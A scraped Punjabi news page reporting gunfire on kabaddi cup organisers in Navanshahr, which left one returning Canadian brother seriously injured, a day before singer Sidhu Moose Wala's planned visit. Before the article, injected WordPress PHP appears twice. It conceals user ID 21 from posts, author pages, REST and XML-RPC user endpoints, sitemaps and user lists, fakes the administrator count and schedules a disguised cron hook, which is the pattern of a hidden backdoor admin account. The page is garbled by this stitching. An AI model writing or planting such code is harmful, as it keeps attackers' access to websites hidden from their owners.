add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਸਿੱਧੂ ਮੂਸੇ ਵਾਲੇ ਦੀ ਆਮਦ ਤੋਂ ਇਕ ਦਿਨ ਪਹਿਲਾਂ ਗੋਲੀਆਂ ਚੱਲੀਆਂ ; ਇਕ ਜ਼ਖਮੀ - Press Ki Taquat
No Result
View All Result
ਨਵਾਂਸ਼ਹਿਰ, 18 ਫਰਵਰੀ (ਪ੍ਰੈਸ ਕਿ ਤਾਕਤ ਬਿਊਰੋ) : ਗਾਇਕ ਸਿੱਧੂ ਮੂਸੇ ਵਾਲਾ ਦੀ ਆਮਦ ਤੋਂ ਇਕ ਦਿਨ ਪਹਿਲਾਂ 5-6 ਅਣਪਛਾਤਿਆਂ ਵਲੋਂ ਕਬੱਡੀ ਪ੍ਰਬੰਧਕਾਂ ‘ਤੇ ਚਲਾਈਆਂ ਅੰਨ੍ਹੇਵਾਹ ਗੋਲੀਆਂ ਕਾਰਨ ਇਸ ਮਹੀਨੇ ਦਾ ਦੂਸਰਾ ਕਬੱਡੀ ਕੱਪ ਵੀ ਰੱਦ ਹੋ ਕੇ ਰਹਿ ਗਿਆ ਹੈ | ਕਬੱਡੀ ਕੱਪ ਲਈ ਤਿਆਰ ਕੀਤੇ ਖੇਡ ਮੈਦਾਨ ਤੋਂ ਆਪਣੇ ਘਰ ਗੜ੍ਹਸ਼ੰਕਰ ਜਾ ਰਹੇ ਪ੍ਰਵਾਸੀ ਭਰਾਵਾਂ ਦਾ ਪਿੱਛਾ ਕਰਦਿਆਂ ਕਾਰ ਸਵਾਰ ਹਮਲਾਵਰਾਂ ਵਲੋਂ ਕੀਤੀ ਗੋਲੀਬਾਰੀ ਕਾਰਨ ਇਕ ਦੇ ਗੋਲੀ ਲੱਗਣ ‘ਤੇ ਹਾਲਤ ਗੰਭੀਰ ਦੱਸੀ ਜਾ ਰਹੀ ਹੈ |
ਜ਼ਿਕਰਯੋਗ ਹੈ ਕਿ ਸ਼ਹੀਦ ਭਗਤ ਸਿੰਘ ਸਪੋਰਟਸ ਐਾਡ ਵੈੱਲਫੇਅਰ ਕਲੱਬ ਵਲੋਂ ਪ੍ਰਵਾਸੀ ਭਾਰਤੀਆਂ ਦੇ ਸਹਿਯੋਗ ਨਾਲ ਅੱਜ ਆਈ.ਟੀ.ਆਈ. ਗਰਾਊਾਡ ਨਵਾਂਸ਼ਹਿਰ ਵਿਖੇ ਦੂਸਰਾ ਕਬੱਡੀ ਕੱਪ ਕਰਵਾਇਆ ਜਾ ਰਿਹਾ ਸੀ | ਪ੍ਰਬੰਧਕਾਂ ਵਲੋਂ ਗਾਇਕ ਸਿੱਧੂ ਮੂਸੇ ਵਾਲਾ ਨੂੰ ਵੀ ਪ੍ਰੋਗਰਾਮ ਪੇਸ਼ ਕਰਨ ਲਈ ਬੁਲਾਇਆ ਗਿਆ ਸੀ ਪਰ ਐੱਸ.ਡੀ.ਐਮ. ਨਵਾਂਸ਼ਹਿਰ ਜਗਦੀਸ਼ ਸਿੰਘ ਜੌਹਲ ਵਲੋਂ ਸ਼ਿਕਾਇਤਾਂ ਨੂੰ ਆਧਾਰ ਬਣਾ ਕੇ ਅਤੇ ਵਿਦਿਆਰਥੀਆਂ ਦੇ ਇਮਤਿਹਾਨਾਂ ਨੂੰ ਲੈ ਕੇ ਪੰਜਾਬ ‘ਤੇ ਹਰਿਆਣਾ ਹਾਈ ਕੋਰਟ ਦੇ ਆਦੇਸ਼ਾਂ ਦੀ ਪਾਲਣਾ ਕਰਦਿਆਂ ਸਿਰਫ਼ ਕਬੱਡੀ ਕੱਪ ਕਰਵਾਉਣ ਦੀ ਆਗਿਆ ਦਿੱਤੀ ਗਈ | ਜਦ ਕਿ ਸਾਊਾਡ ਦੀ ਆਗਿਆ ਨਾ ਮਿਲਣ ਕਰਕੇ ਸਿੱਧੂ ਮੂਸੇ ਵਾਲਾ ਵਿਸ਼ੇਸ਼ ਮਹਿਮਾਨ ਦੇ ਤੌਰ ‘ਤੇ ਹੀ ਆ ਰਿਹਾ ਸੀ |
ਸਮਾਗਮ ਦੀਆਂ ਪ੍ਰਬੰਧਕਾਂ ਵਲੋਂ ਤਿਆਰੀਆਂ ਮੁਕੰਮਲ ਕਰ ਲਈਆਂ ਗਈਆਂ ਸਨ ਕਿ ਬੀਤੀ ਰਾਤ ਕਰੀਬ ਨੌਾ ਵਜੇ ਭਰਾ ਕਰਨਦੀਪ ਸਿੰਘ ਉਰਫ਼ ਕਰਨ ਅਤੇ ਸ਼ਰਨਦੀਪ ਸਿੰਘ ਜਦੋਂ ਪਿੰਡ ਬਰਨਾਲਾ ਕਲਾਂ ਵੱਲ ਮੁੜੇ ਤਾਂ ਪਿੱਛੇ ਤੋਂ ਇਕ ਕਾਰ ਵਿਚ ਜਾ ਰਹੇ 5-6 ਨੌਜਵਾਨਾਂ ਵਲੋਂ ਉਨ੍ਹਾਂ ਦੀ ਕਾਰ ਰੋਕ ਕੇ ਉਨ੍ਹਾਂ ‘ਤੇ ਅੰਨੇ੍ਹਵਾਹ ਗੋਲੀਆਂ ਚਲਾ ਦਿੱਤੀਆਂ ਗਈਆਂ | ਇਸ ਕਾਰਨ ਸ਼ਰਨਦੀਪ ਗੰਭੀਰ ਜ਼ਖਮੀ ਹੋ ਗਿਆ, ਜਿਸ ਨੂੰ ਤੁਰੰਤ ਇੱਥੋਂ ਦੇ ਇਕ ਨਿੱਜੀ ਹਸਪਤਾਲ ‘ਚ ਦਾਖ਼ਲ ਕਰਵਾਇਆ ਗਿਆ | ਜਦਕਿ ਕਰਨਦੀਪ ਸਿੰਘ ਵਲੋਂ ਕਾਰ ਭਜਾ ਕੇ ਥਾਣੇ ਲਿਆਂਦੀ ਗਈ ਅਤੇ ਹਮਲਾਵਰ ਆਪਣੀ ਕਾਰ ਦਾ ਟਾਇਰ ਫੱਟਣ ਕਰਕੇ ਕਾਰ ਛੱਡ ਕੇ ਫ਼ਰਾਰ ਹੋ ਗਏ | ਕਰਨਦੀਪ ਸਿੰਘ ਅਤੇ ਸ਼ਰਨਦੀਪ ਸਿੰਘ ਦੋਵੇਂ ਸਕੇ ਭਰਾ ਹਨ ਅਤੇ ਉਹ ਕਰੀਬ 8 ਸਾਲ ਬਾਅਦ ਕੈਨੇਡਾ ਤੋਂ ਭਾਰਤ ਆਏ ਸਨ | ਮਾਮਲੇ ਨੂੰ ਲੈ ਕੇ ਐੱਸ.ਐੱਸ.ਪੀ. ਅਲਕਾ ਮੀਨਾ ਦੀ ਅਗਵਾਈ ‘ਚ ਵੱਖ-ਵੱਖ ਪਹਿਲੂਆਂ ‘ਤੇ ਜਾਂਚ ਕੀਤੀ ਜਾ ਰਹੀ ਹੈ |
Post Views: 135
No Result
View All Result